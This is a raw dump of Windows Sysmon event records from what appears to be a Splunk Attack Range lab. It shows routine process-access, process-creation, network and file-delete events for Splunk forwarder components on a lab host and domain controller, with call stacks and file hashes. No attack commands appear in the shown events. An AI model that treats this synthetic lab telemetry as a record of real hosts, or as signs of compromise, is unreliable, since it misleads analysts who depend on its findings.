12:26:32.327{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017740Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:32.327{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017739Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:32.327{E5A8D418-DC43-63C7-0500-00000000B002}4163684C:\Windows\system32\csrss.exe{E5A8D418-E578-63C7-2302-00000000B002}2540C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017738Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:32.327{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E578-63C7-2302-00000000B002}2540C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017737Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:32.328{E5A8D418-E578-63C7-2302-00000000B002}2540C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000045328Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:32.361{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E578-63C7-6E06-00000000AF02}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045327Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:32.361{FE4C2B44-D9F3-63C7-0500-00000000AF02}4082524C:\Windows\system32\csrss.exe{FE4C2B44-E578-63C7-6E06-00000000AF02}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000045326Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:32.361{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045325Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:32.361{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045324Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:32.361{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045323Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:32.361{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E578-63C7-6E06-00000000AF02}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045322Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:32.361{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000045321Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:32.362{FE4C2B44-E578-63C7-6E06-00000000AF02}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000045320Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:32.142{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 23542300x800000000000000017766Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:33.893{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E90CD69EA7506C09EE5ACA6A3D20084,SHA256=8C4693220613262305E382B4AA15A188CCBCA169F0AB8BE177510E4519FD2BF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000045355Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:33.753{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E579-63C7-7006-00000000AF02}4532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045354Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:33.753{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045353Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:33.753{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045352Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:33.753{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045351Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:33.753{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045350Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:33.753{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E579-63C7-7006-00000000AF02}4532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000045349Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:33.753{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E579-63C7-7006-00000000AF02}4532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000045348Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:33.755{FE4C2B44-E579-63C7-7006-00000000AF02}4532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000045347Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:31.567{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56420-false10.0.1.12-8000- 23542300x800000000000000045346Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:33.510{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=004E4A341ED22BD9D314E41B516A5BA9,SHA256=562CACE6FBB7A408F198F5958B2223F127B4B345936E9585D3FBBBDFFF3D85B8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000017765Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:33.165{E5A8D418-E578-63C7-2402-00000000B002}37441000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045345Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:33.185{FE4C2B44-E579-63C7-6F06-00000000AF02}44321472C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045344Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:33.040{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E579-63C7-6F06-00000000AF02}4432C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045343Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:33.040{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045342Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 